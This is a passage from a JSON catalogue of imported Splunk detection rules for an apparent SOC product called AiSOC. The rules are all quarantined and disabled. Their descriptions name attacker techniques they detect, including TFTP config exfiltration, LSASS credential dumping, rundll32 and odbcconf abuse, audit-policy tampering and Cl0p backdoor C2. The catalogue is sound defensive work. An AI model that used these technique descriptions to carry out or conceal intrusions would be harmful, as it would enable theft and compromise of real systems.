files. Threat actors like Static Tundra have been observed configuring TFTP servers to make device configuration files accessible for exfiltration after gaining initial access. The detection specifically looks for commands that expose critical configuration files such as startup-config, running-config, and other sensitive system information through TFTP. 
This activity is particularly concerning as it may represent an attempt to steal credentials, network topology information, and other sensitive data stored in device configurations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1567", "T1005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-tftp-server-configuration-for-data-exfiltration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1abce487-f480-4d5f-a551-01de0bece0bd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_tftp_server_configuration_for_data_exfiltration.yml" } }, { "id": "splunk-security-content-1acafff9-1347-4b40-abae-f35aa4ba85c1", "type": "detection", "name": "Windows Odbcconf Load Response File", "description": "The following analytic detects the execution of odbcconf.exe with a response file, which may contain commands to load a DLL (REGSVR) or other instructions. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. This activity is significant as it may indicate an attempt to execute arbitrary code or load malicious DLLs, potentially leading to unauthorized actions. 
If confirmed malicious, this could allow an attacker to gain code execution, escalate privileges, or establish persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-odbcconf-load-response-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1acafff9-1347-4b40-abae-f35aa4ba85c1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_odbcconf_load_response_file.yml" } }, { "id": "splunk-security-content-1ad89d24-c856-4a0e-8fdf-c20c7b9febe1", "type": "detection", "name": "Windows AI Platform DNS Query", "description": "The following analytic detects DNS queries initiated by the Windows AI Platform to domains associated with Hugging Face, OpenAI, and other popular providers of machine learning models and services. Monitoring these DNS requests is important because it can reveal when systems are accessing external AI platforms, which may indicate the use of third-party AI resources or the transfer of sensitive data outside the organization\u2019s environment. Detecting such activity enables organizations to enforce data governance policies, prevent unapproved use of external AI services, and maintain visibility into potential data exfiltration risks. 
Proactive monitoring provides better control over AI model usage and helps safeguard organizational data flows.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ai-platform-dns-query.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1ad89d24-c856-4a0e-8fdf-c20c7b9febe1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ai_platform_dns_query.yml" } }, { "id": "splunk-security-content-1adc9548-da7c-11eb-8f13-acde48001122", "type": "detection", "name": "Print Spooler Failed to Load a Plug-in", "description": "The following analytic detects driver load errors in the Windows PrintService Admin logs, specifically identifying issues related to CVE-2021-34527 (PrintNightmare). It triggers on error messages indicating the print spooler failed to load a plug-in module, such as \"meterpreter.dll,\" with error code 0x45A. This detection method leverages specific event codes and error messages. This activity is significant as it may indicate an exploitation attempt of a known vulnerability. 
If confirmed malicious, an attacker could gain unauthorized code execution on the affected system, leading to potential system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/print-spooler-failed-to-load-a-plug-in.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1adc9548-da7c-11eb-8f13-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/print_spooler_failed_to_load_a_plug_in.yml" } }, { "id": "splunk-security-content-1adffe86-10c3-11ec-8ce6-acde48001122", "type": "detection", "name": "Rundll32 Control RunDLL World Writable Directory", "description": "The following analytic detects the execution of rundll32.exe with the `Control_RunDLL` command, loading files from world-writable directories such as windows\\temp, programdata, or appdata. This detection leverages Endpoint Detection and Response (EDR) telemetry, focusing on process command-line data and specific directory paths. This activity is significant as it may indicate an attempt to exploit CVE-2021-40444 or similar vulnerabilities, allowing attackers to execute arbitrary code. 
If confirmed malicious, this could lead to unauthorized code execution, privilege escalation, or persistent access within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/rundll32-control-rundll-world-writable-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1adffe86-10c3-11ec-8ce6-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/rundll32_control_rundll_world_writable_directory.yml" } }, { "id": "splunk-security-content-1ae407b0-a042-4eb0-834a-590da055575e", "type": "detection", "name": "Windows File and Directory Enable ReadOnly Permissions", "description": "The following analytic detects instances where file or folder permissions are modified to grant read-only access. Such changes are characterized by the presence of read-related permissions (e.g., R, REA, RA, RD) and the absence of write (W) or execute (E) permissions. Monitoring these events is crucial for tracking access control changes that could be intentional for restricting access or indicative of malicious behavior. 
Alerts generated by this detection help ensure that legitimate security measures are enforced while unauthorized changes are promptly investigated.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-file-and-directory-enable-readonly-permissions.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1ae407b0-a042-4eb0-834a-590da055575e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_file_and_directory_enable_readonly_permissions.yml" } }, { "id": "splunk-security-content-1af84ac8-05ea-4f11-8541-b2d1e45a7744", "type": "detection", "name": "Windows RDP Client Launched with Admin Session", "description": "This detection identifies the execution of the Windows Remote Desktop Client (mstsc.exe) with the \"/v\" and /admin command-line arguments. The \"/v\" flag specifies the remote host to connect to, while the /admin flag initiates a connection to the target system\u2019s console session, often used for administrative purposes. This combination may indicate that a user or attacker is performing privileged remote access, potentially to manage a system without disrupting existing user sessions. While such usage may be legitimate for IT administrators, it is less common in typical user behavior. Threat actors may abuse this capability during lateral movement to maintain stealthy access to high-value systems. 
Monitoring for this pattern can help detect interactive hands-on-keyboard activity, privilege abuse, or attempts to access critical infrastructure without leaving typical login traces associated with non-admin RDP sessions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-rdp-client-launched-with-admin-session.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1af84ac8-05ea-4f11-8541-b2d1e45a7744", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_rdp_client_launched_with_admin_session.yml" } }, { "id": "splunk-security-content-1b7bfb2c-b8e6-11eb-99ac-acde48001122", "type": "detection", "name": "Detect Renamed WinRAR", "description": "The following analytic identifies instances where `WinRAR.exe` has been renamed and executed. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and original file names within the Endpoint data model. This activity is significant because renaming executables is a common tactic used by attackers to evade detection. 
If confirmed malicious, this could indicate an attempt to bypass security controls, potentially leading to unauthorized data extraction or further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1560.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-renamed-winrar.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1b7bfb2c-b8e6-11eb-99ac-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_renamed_winrar.yml" } }, { "id": "splunk-security-content-1b8a468a-52e3-4206-b14a-73165441684c", "type": "detection", "name": "Windows Chromium Process Loaded Extension via Command-Line", "description": "The following analytic detects instances where Google Chrome is started with the --load-extension command-line flag, which allows loading unpacked or non-standard extensions. This behavior can indicate attempts to bypass enterprise extension policies, install malicious extensions, or load potentially harmful browser components. 
Monitoring such activity helps identify unauthorized extension usage, potential malware persistence mechanisms, or policy violations that could compromise browser security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1185" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-chromium-process-loaded-extension-via-command-line.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1b8a468a-52e3-4206-b14a-73165441684c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_chromium_process_loaded_extension_via_command_line.yml" } }, { "id": "splunk-security-content-1bbe54f1-93d7-4764-8a01-ddaa12ece7ac", "type": "detection", "name": "ASL AWS IAM Successful Group Deletion", "description": "The following analytic detects the successful deletion of a group within AWS IAM, leveraging CloudTrail IAM events. This action, while not inherently malicious, can serve as a precursor to more sinister activities, such as unauthorized access or privilege escalation attempts. By monitoring for such deletions, the analytic aids in identifying potential preparatory steps towards an attack, allowing for early detection and mitigation. 
The identification of this behavior is crucial for a SOC to prevent the potential impact of an attack, which could include unauthorized access to sensitive resources or disruption of AWS environment operations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.003", "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-iam-successful-group-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1bbe54f1-93d7-4764-8a01-ddaa12ece7ac", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_iam_successful_group_deletion.yml" } }, { "id": "splunk-security-content-1bc8f235-5d7c-457c-95ca-5e92edcb52ea", "type": "detection", "name": "ESXi Shared or Stolen Root Account", "description": "This detection monitors for signs of a shared or potentially compromised root account on ESXi hosts by tracking the number of unique IP addresses logging in as root within a short time window. 
Multiple logins from different IPs in a brief period may indicate credential misuse, lateral movement, or account compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/esxi-shared-or-stolen-root-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1bc8f235-5d7c-457c-95ca-5e92edcb52ea", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/esxi_shared_or_stolen_root_account.yml" } }, { "id": "splunk-security-content-1be30d80-3a39-4df9-9102-64a467b24abc", "type": "detection", "name": "Living Off The Land Detection", "description": "The following correlation identifies multiple risk events associated with the \"Living Off The Land\" analytic story, indicating potentially suspicious behavior. It leverages the Risk data model to aggregate and correlate events tagged under this story, focusing on systems with a high count of distinct sources. This activity is significant as it often involves the use of legitimate tools for malicious purposes, making detection challenging. 
If confirmed malicious, this behavior could allow attackers to execute code, escalate privileges, or persist within the environment using trusted system utilities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105", "T1190", "T1059", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/living-off-the-land-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1be30d80-3a39-4df9-9102-64a467b24abc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/living_off_the_land_detection.yml" } }, { "id": "splunk-security-content-1bed7774-304a-4e8f-9d72-d80e45ff492b", "type": "detection", "name": "Detect Outbound SMB Traffic", "description": "The following analytic detects outbound SMB (Server Message Block) connections from internal hosts to external servers. It identifies this activity by monitoring network traffic for SMB requests directed towards the Internet, which are unusual for standard operations. This detection is significant for a SOC as it can indicate an attacker's attempt to retrieve credential hashes through compromised servers, a key step in lateral movement and privilege escalation. 
If confirmed malicious, this activity could lead to unauthorized access to sensitive data and potential full system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-outbound-smb-traffic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1bed7774-304a-4e8f-9d72-d80e45ff492b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/detect_outbound_smb_traffic.yml" } }, { "id": "splunk-security-content-1bf500e5-1226-41d9-af5d-ed1f577929f2", "type": "detection", "name": "Windows Important Audit Policy Disabled", "description": "The following analytic detects the disabling of important audit policies. It leverages EventCode 4719 from Windows Security Event Logs to identify changes where success or failure auditing is removed. This activity is significant as it suggests an attacker may have gained access to the domain controller and is attempting to evade detection by tampering with audit policies. If confirmed malicious, this could lead to severe consequences, including data theft, privilege escalation, and full network compromise. 
Immediate investigation is required to determine the source and intent of the change.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-important-audit-policy-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1bf500e5-1226-41d9-af5d-ed1f577929f2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_important_audit_policy_disabled.yml" } }, { "id": "splunk-security-content-1bf631d1-44a0-472b-98c4-2975b8b281df", "type": "detection", "name": "Cisco Duo Admin Login Unusual Country", "description": "The following analytic detects instances where a Duo admin login originates from a country outside of the United States, which may indicate suspicious or unauthorized access attempts. Please adjust as needed to your environment. It works by analyzing Duo activity logs for admin login actions and keeping only events where the access device's country falls outside the expected region (the United States by default). By correlating user, device, browser, and location details, the analytic highlights anomalies in geographic login patterns. This behavior is critical for a SOC to identify because admin accounts have elevated privileges, and access from unusual countries can be a strong indicator of credential compromise, account takeover, or targeted attacks. 
Early detection of such activity enables rapid investigation and response, reducing the risk of unauthorized changes, data breaches, or further lateral movement within the environment. The impact of this attack can be severe, potentially allowing attackers to bypass security controls, alter configurations, or exfiltrate sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-duo-admin-login-unusual-country.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1bf631d1-44a0-472b-98c4-2975b8b281df", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_duo_admin_login_unusual_country.yml" } }, { "id": "splunk-security-content-1c077b8a-95a3-4692-980d-c72fc50e9930", "type": "detection", "name": "Cisco Secure Firewall - Oracle E-Business Suite Exploitation", "description": "This analytic detects vulnerability exploitation and post-compromise activity associated with Oracle E-Business Suite web-application vulnerabilities, CVE-2025-61882 and CVE-2025-61884.\nSIDs 65413-65415 detect Java.Backdoor.Cl0p variant payload downloads and Java.Backdoor.Cl0p outbound\ncommand-and-control connection attempts.\nSIDs 65456, 65377 and 65378 detect attempts to exploit these vulnerabilities.\nSecurity teams should investigate any instances of these signatures, especially if they are found in conjunction with other suspicious network activity or on systems that should not be exposed to such 
threats.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-oracle-e-business-suite-exploitation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1c077b8a-95a3-4692-980d-c72fc50e9930", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___oracle_e_business_suite_exploitation.yml" } }, { "id": "splunk-security-content-1c21fed1-7000-4a2e-9105-5aaafa437247", "type": "detection", "name": "Okta Multiple Failed Requests to Access Applications", "description": "The following analytic detects multiple failed attempts to access applications in Okta, potentially indicating the reuse of a stolen web session cookie. It leverages Okta logs to evaluate policy and SSO events, aggregating data by user, session, and IP. The detection triggers when more than half of the app sign-on attempts are unsuccessful across multiple applications. This activity is significant as it may indicate an attempt to bypass authentication mechanisms. 
If confirmed malicious, it could lead to unauthorized access to sensitive applications and data, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1550.004", "T1538" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/okta-multiple-failed-requests-to-access-applications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1c21fed1-7000-4a2e-9105-5aaafa437247", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/okta_multiple_failed_requests_to_access_applications.yml" } }, { "id": "splunk-security-content-1c34549e-c31b-11eb-996b-acde48001122", "type": "detection", "name": "Detect AzureHound File Modifications", "description": "The following analytic detects the creation of specific AzureHound-related files, such as `*-azurecollection.zip` and various `.json` files, on disk. It leverages data from the Endpoint.Filesystem datamodel, focusing on file creation events with specific filenames. This activity is significant because AzureHound is a tool used to gather information about Azure environments, similar to SharpHound for on-premises Active Directory. 
If confirmed malicious, this activity could indicate an attacker is collecting sensitive Azure environment data, potentially leading to further exploitation or privilege escalation within the cloud infrastructure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.001", "T1069.002", "T1087.001", "T1087.002", "T1482" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-azurehound-file-modifications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1c34549e-c31b-11eb-996b-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_azurehound_file_modifications.yml" } }, { "id": "splunk-security-content-1c6abb08-73d1-11ec-9ca0-acde48001122", "type": "detection", "name": "Windows Hunting System Account Targeting Lsass", "description": "The following analytic identifies processes attempting to access Lsass.exe, which may indicate credential dumping or applications needing credential access. It leverages Sysmon EventCode 10 to detect such activities by analyzing fields like TargetImage, GrantedAccess, and SourceImage. This behavior is significant as unauthorized access to Lsass.exe can lead to credential theft, posing a severe security risk. 
If confirmed malicious, attackers could gain access to sensitive credentials, potentially leading to privilege escalation and further compromise of the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-hunting-system-account-targeting-lsass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1c6abb08-73d1-11ec-9ca0-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_hunting_system_account_targeting_lsass.yml" } }, { "id": "splunk-security-content-1cb40e15-cffa-45cc-abbd-e35884a49766", "type": "detection", "name": "Windows Spearphishing Attachment Connect To None MS Office Domain", "description": "The following analytic identifies suspicious Office documents that connect to non-Microsoft Office domains. It leverages Sysmon EventCode 22 to detect processes like winword.exe or excel.exe making DNS queries to domains outside of *.office.com or *.office.net. This activity is significant as it may indicate a spearphishing attempt using malicious documents to download or connect to harmful content. 
If confirmed malicious, this could lead to unauthorized data access, malware infection, or further network compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-spearphishing-attachment-connect-to-none-ms-office-domain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1cb40e15-cffa-45cc-abbd-e35884a49766", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/windows_spearphishing_attachment_connect_to_none_ms_office_domain.yml" } }, { "id": "splunk-security-content-1cbcf75f-0e45-4f29-8c1b-7fcd7e55cc55", "type": "detection", "name": "Cisco NVM - Suspicious Network Connection Initiated via MsXsl", "description": "This analytic identifies the use of `msxsl.exe` initiating a network connection to a non-private IP address.\nAlthough `msxsl.exe` is a legitimate Microsoft utility used to apply XSLT transformations, adversaries can abuse it\nto execute arbitrary code or load external resources in an evasive manner.\nThis detection leverages Cisco NVM telemetry to identify potentially malicious use of `msxsl.exe` making network connections\nthat may indicate command and control (C2) or data exfiltration activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1220" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": 
false, "path": "detections/splunk-imports/_quarantine/cisco-nvm-suspicious-network-connection-initiated-via-msxsl.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1cbcf75f-0e45-4f29-8c1b-7fcd7e55cc55", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_nvm___suspicious_network_connection_initiated_via_msxsl.yml" } }, { "id": "splunk-security-content-1cd983c8-8fd6-11ec-a09d-acde48001122", "type": "detection", "name": "Windows Disable Notification Center", "description": "The following analytic detects the modification of the Windows registry to disable the Notification Center on a host machine. It leverages data from the Endpoint.Registry data model, specifically looking for changes to the \"DisableNotificationCenter\" registry value set to \"0x00000001.\" This activity is significant because disabling the Notification Center can be a tactic used by RAT malware to hide its presence and subsequent actions. 
If confirmed malicious, this could allow an attacker to operate stealthily, potentially leading to further system compromise and data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-disable-notification-center.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1cd983c8-8fd6-11ec-a09d-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_disable_notification_center.yml" } }, { "id": "splunk-security-content-1cefb270-74a5-4e27-aa0c-2b6fa7c5b4ed", "type": "detection", "name": "Linux Kworker Process In Writable Process Path", "description": "The following analytic detects the execution of a kworker process with a command line in writable directories such as /home/, /var/log, and /tmp on a Linux machine. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and parent process paths. This activity is significant as kworker processes are typically kernel threads, and their presence in writable directories is unusual and indicative of potential malware, such as CyclopsBlink. 
If confirmed malicious, this could allow attackers to blend malicious processes with legitimate ones, leading to persistent access and further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-kworker-process-in-writable-process-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1cefb270-74a5-4e27-aa0c-2b6fa7c5b4ed", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_kworker_process_in_writable_process_path.yml" } }, { "id": "splunk-security-content-1cfab663-9adc-4169-a88c-6bae29ba3c70", "type": "detection", "name": "Ollama Excessive API Requests", "description": "Detects potential Distributed Denial of Service (DDoS) attacks or rate limit abuse against Ollama API endpoints by identifying excessive request volumes from individual client IP addresses. 
This detection monitors GIN-formatted Ollama server logs to identify clients generating abnormally high request rates within short time windows, which may indicate automated attacks, botnet activity, or resource exhaustion attempts targeting local AI model infrastructure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1498" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ollama-excessive-api-requests.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1cfab663-9adc-4169-a88c-6bae29ba3c70", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/ollama_excessive_api_requests.yml" } }, { "id": "splunk-security-content-1d19037f-466e-4d56-8d87-36fafd9aa3ce", "type": "detection", "name": "Linux Puppet Privilege 